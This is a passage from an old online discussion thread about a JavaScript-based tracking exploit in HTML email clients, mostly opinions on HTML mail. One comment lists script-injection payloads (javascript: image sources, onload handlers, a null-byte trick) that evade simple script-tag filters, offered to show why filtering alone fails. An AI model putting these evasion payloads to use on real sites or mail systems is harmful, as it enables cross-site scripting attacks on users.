  91. Bye Bye trade secrets! (was Re: Active vs passive) by Bloody+Peasant · · Score: 1
    : ...And in the business world the phrase "time equals money"
    : has been given the status of a law...

    If that's the case, then the business world should be one of the first communities demanding that javascript be stripped from all e-mail clients. Can you spell trade secret, as in leakage thereof, and the losses likely encurred as a result?

    --
    -- This .sig intentionally left meaningless.
  92. I agree by jawtheshark · · Score: 1

    I agree with the statement that all the bloat and extra-non-standard thingies in Outlook are enabled by default...but do not forget *why* they did that: they know that Joe User does not know how to enable them but they want to show him eyecandy anyway(Joe User likes eyecandy). Why? That's simple: it makes the competition look "dull".
    Joe User doesn't realise he is not complying to standards and pretty fast other Joe Users will see his flashy email client, want it, and use the non standard stuff: Voila... standards broken, Joe User happy (in his ignorance) and all nerds/geeks angry. It's the price of being a minority.

    --
    Ahhh...the great dumpster continuum. Many a free computer will be found there. -- sowth (748135)
  93. Email tracking by delmoi · · Score: 2

    forward this message to all your frends! Microsoft corp is going is conducting a test of email tracking software, will pay you $2500 for every message you forward. Intel, AOL, ICQ, and Disney corp are also somehow involved!

    Heh, this I find interesting. I remember swareing up and down that getting a virus through email was imposible once, to.

    --

    ReadThe ReflectionEngine, a cyberpunk style n
  94. What about Web bugs? by somerandomchars · · Score: 1

    I am extremely disheartened at this so-called "new" email exploit that has been in existence since Javascript enabled e-mail clients crawled out of their spawning pools. Big whoop. Besides, spamalicious webmasters and bulk mailers have been using those insidious 1 pixel by 1 pixel WEB BUGS to do exactly what this "new exploit" can do, all without requiring javascript.

    The Sad Truth is that the Internet is a breeding ground for malicious applications of technology brought to bear against largely ignorant masses.

    --
    "The genes are the master programmers, and they are programming for their lives" - Richard Dawkins
  95. So, does this means..... by carlos_benj · · Score: 5

    ...that Bill Gates can track how many people I forwarded that email to now? Gosh! I'm sure my check must be in the mail already.

    --

    --

    As a matter of fact, I am a lawyer. But I play an actor on TV.

    1. Re:So, does this means..... by drinkypoo · · Score: 1

      This also has potential positive ramifications for "I'm going to disneyland!"


      --

      --
      "You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
  96. Re:Active vs passive content in emails by EllisDees · · Score: 1

    Then why bother? The information content is exactly the same whether you use text or html, but with text there is no chance of silly exploits like this. You gain exactly *nothing* by using html.

    --
    -- Give me ambiguity or give me something else!
  97. AOL not affected? by leviramsey · · Score: 1

    I thought that AOL's email client was a port of OE. If that's so, then why is AOL immune to this security hole (a possible first)?

  98. Re:Our organization by Tralfamadorian · · Score: 1

    I know! Mutt is the TRUE answer.


    He who knows not, and knows he knows not is a wise man

  99. Re:Active vs passive content in emails by irksome · · Score: 1

    Most users who send HTML e-mail have no idea that they're sending the HTML. They don't have to type out all the code, they just use their favorite mail program, which adds the HTML tags on it's own.

    -

  100. Java isn't Javascript by Carnage4Life · · Score: 4

    All I have to say is that if you think Java is insecure

    Java is rather secure as can be seen by reading any of the numerous articles on the web about it. Javascript on the other hand is a disaster which was foisted on us by Netscape and excarberated by Microsoft.

    PS: You do realize that the NY Times article is discussing a Javascript exploit and not a Java one, right?

    Grabel's Law

  101. Failure of non-HTML text formatting... by singularity · · Score: 2

    Eudora used to include the ability to generate formatted, but non-HTML, text. It included everything you mention, and did not include any networking-specific code. It failed (no one else started to use it, so it was Eudora-specific, and HTML mail became all the rage). It would be a great idea of someone would write up a subset of HTML as an RFC that could be used simply for text formatting (STRONG, BLOCKQUOTE, etc. - maybe even TABLE) for email use (and I would image there are many other uses, as well).

    Text/enriched seems to cover this (RFC 1896), but that is Eudora's failed attempt.

    I would look for most mailers to move to where they get rid of image-fetching and JavaScript.

    --
    - (c) 2018 Hank Zimmerman
    1. Re:Failure of non-HTML text formatting... by roca · · Score: 2

      There is XHTML Basic, which is a little subset of XHTML suitable for text messaging. I haven't checked to see if it includes inline images or scripting.

  102. Filter out "script" tags. by biftek · · Score: 1

    Perhaps we should all set up a filter to look for script tags in messages and tag them so they can be dealt with? Would be a wise move IMO.

    1. Re:Filter out "script" tags. by roady · · Score: 1

      filtering script tags in far from enough.
      There are numerous ways to have script executed in a page.

      to name few:
      alert('foo')

      btw if IE finds a \0 anywhere in a page it is just stripped out. Your parser would have to take this into account.

  103. Re:Security breach scoreboard... by Nickoty · · Score: 1

    This demonstrates something common when Linux-people complain about MS.. Spending hours (days!!) setting up X & co is ok, but even going thru the menus in IE5 is 'too much work' for some strange reason. An actual linux-zealot I know complained about the silly 'Go!'-button right of the URL field in IE, and about the fact that IE doesn't do 'autocompletion' of URLs as you type them, and that the smooth scroll is silly, and that those 'friendly error messages' are stupid. All of these are just checkboxes in the configuration. Wierd!

    --


    -- Cure for Cancer instead of SETI! (only w32 yet - mail and beg)
  104. Too bizarre, also almost too unbelievable. by dave-fu · · Score: 1

    I wasn't aware that JavaScript had any object model to interact with outside of its context as a web page or what have you, which is to say: using JS, I can't detect when the back/next button is clicked and use it to trigger an event.
    Apparently (according to the "Privacy Foundation"'s website, it piggybacks onto the base functionality that some clients provide that notify you when someone has read your message, and add in text to the payload when someone forwards (responds?) to the message.
    They also claim that this has been in the wild since '98 at least, despite no big hubub over it? Fishy, fishy, fishy. I'm waiting to see the 'sploit code to buy it myself.

    --
    Easy does it!
    This comment has been submitted already, 276865 hours , 59 minutes ago. No need to try again.
  105. Our organization by AntiPasto · · Score: 2
    relies heavility on Pine on BSD....... is it safe to say we're pretty resilient to any kind of email malay?

    ----

    1. Re:Our organization by rmstar · · Score: 1

      What's a malaise, a woman from Malaysia?

      Duh,
      rmstar

    2. Re:Our organization by roman_mir · · Score: 2

      If your organization only uses email for internal communications then yes. If there are external contacts you make via your email, then no. Basically it does not matter what you do, it matters what other people you email to do, and probably the people who communicate with the people that you communicate with do, etc.etc.etc. Basically this means we are all screwed.

  106. "I can be careful, I'm still vulnerable." by MoNickels · · Score: 4

    Another reason HTML email is bad, besides: wasted bandwith and storage space, slow loading times, cruddy appearance in text interfaces, interference of ads in personal messages, tracking users' habits by matching email address to cookie, bad cross-platform compatibility, necessity of being connected to view it as intended, being filtered or bounced by no-HTML mail lists, etc., etc. It's not really that much of a surprise.

    --

    Wordnik, a dictionary project which aims to collect

  107. Active vs passive content in emails by sharkticon · · Score: 3

    This is going to further fuel the debate over whether or not email and news posting should consist of active (JavaScript, DHTML and so on) or passive (plain text, HTML) content. I suppose really it depends on what sort of person you are.

    Whilst technically you can convey whatever information you want through the use of plain text (maybe using some *emphasis*) and attachments, for many this is a solution which is less convenient for them - it requires more clicks or keypresses to access, and doesn't present the information in quite such an integrated manner. And in the business world the phrase "time equals money" has been given the status of a law, with companies paying out huge sums of cash to time management consultants and the like. These people don't want any extra time or hassle in their emails, not when they're receiving well over a hundred every day.

    For business types active content and embedded files mean more productivity and an easier email experiance. They're not concerned about privacy issues, and if they are then well, it's the job of the IT guys, right? So this sort of bug is inevitable - either you cripple active content - somthing that's too late to do - or you try and provide rock solid security - a challenge people seem only too willing to take on.

    It all depends on a) your willingness to expose yourself to risk, and b) your desire for presentation and convenience. Seeing as the web has moved from text-based to graphics-based in the majority, I think the future of email is going to be the same, whether we like it or not.

    --

  108. Desensitized by tethal91 · · Score: 2

    I think that I should be worried or annoyed by this but I (we) are so used to security holes, lack of privacy online, and spam that the general level of interest I can come up with is pretty minimal. On the one hand, its pretty sad that there is so much of this stuff that we are desensitized to it; on the other hand, the Internet is still like the Wild West in a sense - its a frontier with the requisite frontier mentality. I'm sure this has been said elsewhere better than I am saying it, but I think that the dynamic of those pushing the boundaries with advances versus those who try to expolit those boundaries versus those that try and stop them creates a better future world. Those of us on the fringes may be the occasional casuality, but maybe, just maybe, its for the greater good...

    --
    There is no guarantee that the content has been read or understood.
  109. Re:Filter out "script" tags. *oups* by roady · · Score: 1

    Sorry, I should have used extrans mode

    filtering script tags in far from enough.

    There are numerous ways to have script executed in a page.

    to name few:

    <script language=javascript>alert('foo')</script>
    <img src="javascript:alert('foo')">
    <img src="mocha:"alert('foo');>
    <img src="" onload="alert('foo')">

    btw if IE finds a \0 anywhere in a page it is just stripped out. Your parser would have to take this into account.

  110. Re:the point by NortonDC · · Score: 1

    That's not true. Set your client to always respond with pure text AND set your client not to execute Javascript.

    No mail sent to you will trigger this vulnerability and no mail sent from (or through) you will trigger this vulnerability.

    Outlook Express supports these settings.

  111. Just Another Reason to Dislike HTML e-Mail by mindVapour · · Score: 1

    As if we needed another reason to detest HTML email. Getting a mailbox full of 2-line 14K messages was already annoying enough. Now that the NY Times has unleashed the BIG SECRET about HTML mail we can expect the script kiddies to realise they can VIEW the source and even copy Javascript code. Oh, joy.

    Personally, I'm a Luddite, and Telnet into my ISP's POP server from work. I just give the client a huge buffer and watch the tags scroll by for fun.

    - mindVapour

  112. Re:Turn Off JavaScript by ColdGrits · · Score: 1

    Spot who didn't READthe article (or even the summary)...

    It doesn't matter if YOUR email client is javascript enabled or disabled, if the person you are emailing has theirs enabled.

    Nex ttime, read the article before commenting, huh?

    --

    --
    People should not be afraid of their governments - Governments should be afraid of their people.
  113. Communication is about risk by Dalapin · · Score: 1

    This is why I have an email address which I never tell anyone about. That way I am sure that I will never get any spam or stupid emails through it. The funny thing is that I never get any other mail through it either.

    --
    If you want to email me, think baseball.
  114. the point by www.sorehands.com · · Score: 4
    The point I was trying to make is that even with javascript turned off, the information is sent. The original piece gives the impression that if everyone turned off javascript, you'd be safe.

  115. Re:Old News - October 5, 1998 by jij · · Score: 2
  116. Reversed Use by expiredmilk · · Score: 1

    Anyone consider the possibility of doing the same, but targeting the people who we'd ALL love to get rid of? I'm talking about Spammers, of course. Email bug, non-malicious javascript coding that "phones home" and gives you information about Spammers, if the reply to address or postmaster sent @ spammer domain email is opened. Hmmm... Instead of freaking out over every exploit that pops up and scrambling to get patches, I wonder why people don't use it as an opportunity to their own benefit for the greater good.

  117. you're looking at this the wrong way by tenzig_112 · · Score: 1
    Imagine all the cool things you can know about your neighbors now - and how easy it is to spilunk their email.

    I've been thinking of joining the @home service just so I can crack into my neighbors' browser histories and caches. At the next homeowners association meeting, I won't say a word. I swear.

    www.ridiculopathy.com